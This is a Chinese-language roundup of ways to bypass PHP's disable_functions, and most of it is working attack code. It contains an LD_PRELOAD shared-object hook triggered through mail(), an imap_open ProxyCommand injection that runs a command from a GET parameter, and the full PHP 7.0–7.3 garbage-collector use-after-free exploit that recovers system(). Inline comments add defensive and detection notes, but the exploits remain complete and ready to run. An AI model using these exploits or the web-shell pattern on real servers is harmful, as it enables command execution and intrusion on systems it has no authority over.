# 绕过disable_function汇总
## 第一种方式—利用LD_PRELOAD
```php
<?php
// Technique: LD_PRELOAD is inherited by any child process the PHP worker
// spawns, so a shared object named here is mapped into the helper that
// mail() execs. The .so itself is the C listing that follows. This only
// works while putenv() and mail() (or another function that forks a
// helper) are not in disable_functions.
putenv("LD_PRELOAD=/tmp/hack.so");
// mail() forks the configured sendmail binary; the dynamic loader honours
// LD_PRELOAD for that child, not for the PHP process itself.
mail("a@localhost", "", "", "", "");
// Alternative trigger kept by the author: error_log() with message type 1
// also delivers via mail().
//error_log("a",1);
// Defensive note: add putenv (and, where unused, mail) to disable_functions,
// and alert on web-server children started with LD_PRELOAD set or on .so
// files loaded from world-writable directories such as /tmp.
?>
```
```c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/* Runs once the preloaded library is active inside the spawned helper.
 * The author's demo only deletes a marker file; it demonstrates that an
 * arbitrary command executes with the privileges of the web-server user,
 * outside the reach of PHP's disable_functions. */
void payload() {
    system("rm /tmp/check.txt");
}
/* Overrides the libc symbol geteuid(); the spawned mail helper is presumably
 * expected to call it early, which is what makes the hook fire. If
 * LD_PRELOAD is not set the hook simply reports euid 0. Otherwise it clears
 * LD_PRELOAD first (likely so that anything the payload starts is not hooked
 * again) and then runs the payload. Note that this second path falls off the
 * end of a non-void function without returning a value. */
int geteuid() {
    if (getenv("LD_PRELOAD") == NULL) { return 0; }
    unsetenv("LD_PRELOAD");
    payload();
}
/*
$ gcc -c -fPIC hack.c -o hack
$ gcc -shared hack -o hack.so
*/
```
## 第二种方式——imap_open
```php
<?php
# https://antichat.com/threads/463395/#post-4254681
# # echo '1234567890'>/tmp/test0001
#
# Technique: imap_open() hands the {server} part of the mailbox string to the
# rsh/ssh helper, so an embedded -oProxyCommand=... option is executed by that
# helper rather than by PHP. The command comes from $_GET['cmd'], is
# base64-wrapped and decoded again inside the option (presumably to keep shell
# metacharacters out of the option string); tabs rather than spaces separate
# the arguments.
#
# Defensive note: set imap.enable_insecure_rsh=0 (or disable imap_open
# entirely), and alert when php-fpm/apache workers spawn ssh or sh.

error_reporting(0);
if (!function_exists('imap_open')) {
    die("no imap_open function!");
}

$server = "x -oProxyCommand=echo\t" . base64_encode($_GET['cmd'] . ">/tmp/cmd_result") . "|base64\t-d|sh}";
# The '}' at the end of $server closes the mailbox specification opened below.
imap_open('{' . $server . ':143/imap}INBOX', '', ''); // or var_dump("\n\nError: ".imap_last_error());
# The command redirected its own output to a file; read it back for display.
echo file_get_contents("/tmp/cmd_result");
```
## 第三种方式——exec
```php
<?php
// Probe: is exec() available? Prints the command's last output line, then
// every captured line.
$captured = [];
$lastLine = exec("ls", $captured);
echo $lastLine;
echo "</br>";
print_r($captured);
?>
```
## 第四种方式——passthru
```php
<?php
// Probe: is passthru() available? Raw command output is streamed straight to
// the response.
$probeCommand = "ls";
passthru($probeCommand);
?>
```
## 第五种方式——system()
```php
<?php
// Probe: is system() available? Command output is written directly to the
// response.
$probeCommand = 'ls';
system($probeCommand);
?>
```
## 第六种方式——PHP-FPM
[从蚁剑插件看利用PHP-FPM绕过disable_functions](https://www.mi1k7ea.com/2019/08/03/%E4%BB%8E%E8%9A%81%E5%89%91%E6%8F%92%E4%BB%B6%E7%9C%8B%E5%88%A9%E7%94%A8PHP-FPM%E7%BB%95%E8%BF%87disable-functions/)
[PHP 连接方式&攻击PHP-FPM&*CTF echohub WP](https://evoa.me/index.php/archives/52/)
## 第七种方式——PHP 7.0 < 7.3 (Unix) - ‘gc’ Disable Functions Bypass
```php
<?php
# PHP 7.0-7.3 disable_functions bypass PoC (*nix only)
#
# Bug: https://bugs.php.net/bug.php?id=72530
#
# This exploit should work on all PHP 7.0-7.3 versions
# released as of 04/10/2019, specifically:
#
# PHP 7.0 - 7.0.33
# PHP 7.1 - 7.1.31
# PHP 7.2 - 7.2.23
# PHP 7.3 - 7.3.10
#
# Author: https://github.com/mm0r1
#
# Review note: this is memory corruption inside the interpreter (a
# use-after-free reached through unserialize() and gc_collect_cycles()), not a
# configuration bypass, so disable_functions cannot stop it. The durable fix is
# a PHP release newer than the ones listed above (confirm against the bug
# tracker entry); until then, run untrusted PHP under OS-level isolation rather
# than relying on disable_functions alone.

# Entry point: run the given shell command through the recovered system() handler.
pwn("ls");
# Executes $cmd via the engine's own system() implementation, even when
# system() is listed in disable_functions, by turning a dangling string
# reference (bug #72530) into arbitrary read/write over the PHP heap and then
# patching a closure object. Everything below is version/offset specific.
# Detection: a request whose script calls unserialize() on an object graph with
# back-references, followed by gc_collect_cycles() and a closure invocation, is
# a strong indicator of this PoC.
function pwn($cmd) {
    global $abc, $helper;

    # Reads an $s-byte little-endian integer from $str at byte offset $p.
    function str2ptr(&$str, $p = 0, $s = 8) {
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }

    # Encodes $ptr as $m little-endian bytes.
    function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return $out;
    }

    # Overwrites $n bytes of $str at offset $p with the little-endian form of $v.
    function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for($i = 0; $i < $n; $i++) {
            $str[$p + $i] = chr($v & 0xff);
            $v >>= 8;
        }
    }

    # Arbitrary read primitive: writes a pointer into the controlled buffer and
    # then reads the value back through strlen() on $helper->a. The modulo
    # truncates the result to $s bytes (2 << (8*$s - 1) == 2**(8*$s)).
    function leak($addr, $p = 0, $s = 8) {
        global $abc, $helper;
        write($abc, 0x68, $addr + $p - 0x10);
        $leak = strlen($helper->a);
        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }

    # Walks the program headers of the ELF image at $base and returns
    # [data_addr, text_size, data_size] (read-write PT_LOAD segment address and
    # size, read-exec PT_LOAD segment size), or false if any of them was not found.
    function parse_elf($base) {
        $e_type = leak($base, 0x10, 2);

        $e_phoff = leak($base, 0x20);
        $e_phentsize = leak($base, 0x36, 2);
        $e_phnum = leak($base, 0x38, 2);

        for($i = 0; $i < $e_phnum; $i++) {
            $header = $base + $e_phoff + $i * $e_phentsize;
            $p_type = leak($header, 0, 4);
            $p_flags = leak($header, 4, 4);
            $p_vaddr = leak($header, 0x10);
            $p_memsz = leak($header, 0x28);

            if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
                # handle pie: e_type 2 (ET_EXEC) has absolute vaddrs, otherwise relocate
                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                $data_size = $p_memsz;
            } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
                $text_size = $p_memsz;
            }
        }

        if(!$data_addr || !$text_size || !$data_size)
            return false;

        return [$data_addr, $text_size, $data_size];
    }

    # Scans the data segment 8 bytes at a time for the engine's function table,
    # recognised by two consecutive-ish entries whose name pointers point at the
    # strings "constant" and "bin2hex". Returns the table address, or null if the
    # scan completes without a match.
    function get_basic_funcs($base, $elf) {
        list($data_addr, $text_size, $data_size) = $elf;
        for($i = 0; $i < $data_size / 8; $i++) {
            $leak = leak($data_addr, $i * 8);
            if($leak - $base > 0 && $leak - $base < $text_size) {
                $deref = leak($leak);
                # 'constant' constant check
                if($deref != 0x746e6174736e6f63)
                    continue;
            } else continue;

            $leak = leak($data_addr, ($i + 4) * 8);
            if($leak - $base > 0 && $leak - $base < $text_size) {
                $deref = leak($leak);
                # 'bin2hex' constant check
                if($deref != 0x786568326e6962)
                    continue;
            } else continue;

            return $data_addr + $i * 8;
        }
    }

    # Walks backwards one page at a time from a leaked code pointer until the
    # 7-byte ELF magic/identification prefix is found; returns null if it is not
    # within 0x1000 pages.
    function get_binary_base($binary_leak) {
        $base = 0;
        $start = $binary_leak & 0xfffffffffffff000;
        for($i = 0; $i < 0x1000; $i++) {
            $addr = $start - 0x1000 * $i;
            $leak = leak($addr, 0, 7);
            if($leak == 0x10102464c457f) { # ELF header
                return $addr;
            }
        }
    }

    # Iterates the function table in 0x20-byte entries until the entry whose
    # name starts with "system"; returns that entry's handler pointer, or false
    # once a null entry terminates the table.
    function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = leak($addr);
            $f_name = leak($f_entry, 0, 6);

            if($f_name == 0x6d6574737973) { # system
                return leak($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry != 0);
        return false;
    }

    # Class referenced by the serialized payload; its destructor moves the
    # referenced value into $chtg and replaces $ryat, which is what leaves the
    # stale reference behind after garbage collection.
    class ryat {
        var $ryat;
        var $chtg;

        function __destruct()
        {
            $this->chtg = $this->ryat;
            $this->ryat = 1;
        }
    }

    # Holder object: $a is the slot leak() reads through strlen(), $b holds the
    # closure that is patched and invoked at the end.
    class Helper {
        public $a, $b, $c, $d;
    }

    if(stristr(PHP_OS, 'WIN')) {
        die('This PoC is for *nix systems only.');
    }

    $n_alloc = 10; # increase this value if you get segfaults

    # Heap grooming: a run of equally sized strings.
    $contiguous = [];
    for($i = 0; $i < $n_alloc; $i++)
        $contiguous[] = str_repeat('A', 79);

    # Trigger the bug: the back-references in the payload plus a forced GC pass
    # leave $out[2][0] referring to freed memory.
    $poc = 'a:4:{i:0;i:1;i:1;a:1:{i:0;O:4:"ryat":2:{s:4:"ryat";R:3;s:4:"chtg";i:2;}}i:1;i:3;i:2;R:5;}';
    $out = unserialize($poc);
    gc_collect_cycles();

    # Reoccupy the freed chunk with a 79-byte string of the same size, then
    # take the stale reference as the controlled buffer.
    $v = [];
    $v[0] = ptr2str(0, 79);
    unset($v);
    $abc = $out[2][0];

    $helper = new Helper;
    $helper->b = function ($x) { };

    # If $abc still reports its original length the chunk was not reused.
    if(strlen($abc) == 79) {
        die("UAF failed");
    }

    # leaks
    $closure_handlers = str2ptr($abc, 0);
    $php_heap = str2ptr($abc, 0x58);
    $abc_addr = $php_heap - 0xc8;

    # fake value
    write($abc, 0x60, 2);
    write($abc, 0x70, 6);

    # fake reference
    write($abc, 0x10, $abc_addr + 0x60);
    write($abc, 0x18, 0xa);

    $closure_obj = str2ptr($abc, 0x20);

    # Locate the php binary, its segments, the function table and system()'s handler.
    $binary_leak = leak($closure_handlers, 8);
    if(!($base = get_binary_base($binary_leak))) {
        die("Couldn't determine binary base address");
    }

    if(!($elf = parse_elf($base))) {
        die("Couldn't parse ELF header");
    }

    if(!($basic_funcs = get_basic_funcs($base, $elf))) {
        die("Couldn't get basic_functions address");
    }

    if(!($zif_system = get_system($basic_funcs))) {
        die("Couldn't get zif_system address");
    }

    # fake closure object: copy the real closure into the controlled buffer
    $fake_obj_offset = 0xd0;
    for($i = 0; $i < 0x110; $i += 8) {
        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
    }

    # pwn: point $helper->b at the copy and mark it as an internal function
    # whose handler is system()
    write($abc, 0x20, $abc_addr + $fake_obj_offset);
    write($abc, 0xd0 + 0x38, 1, 4); # internal func type
    write($abc, 0xd0 + 0x68, $zif_system); # internal func handler

    # Calling the patched closure now runs $cmd through the engine's system().
    ($helper->b)($cmd);

    exit();
}
```
> 第七种引用 https://www.exploit-db.com/exploits/47462
> 文章来自 [绕过disable_function汇总](https://wulidecade.cn/2019/09/27/%E7%BB%95%E8%BF%87disable-function%E6%B1%87%E6%80%BB/)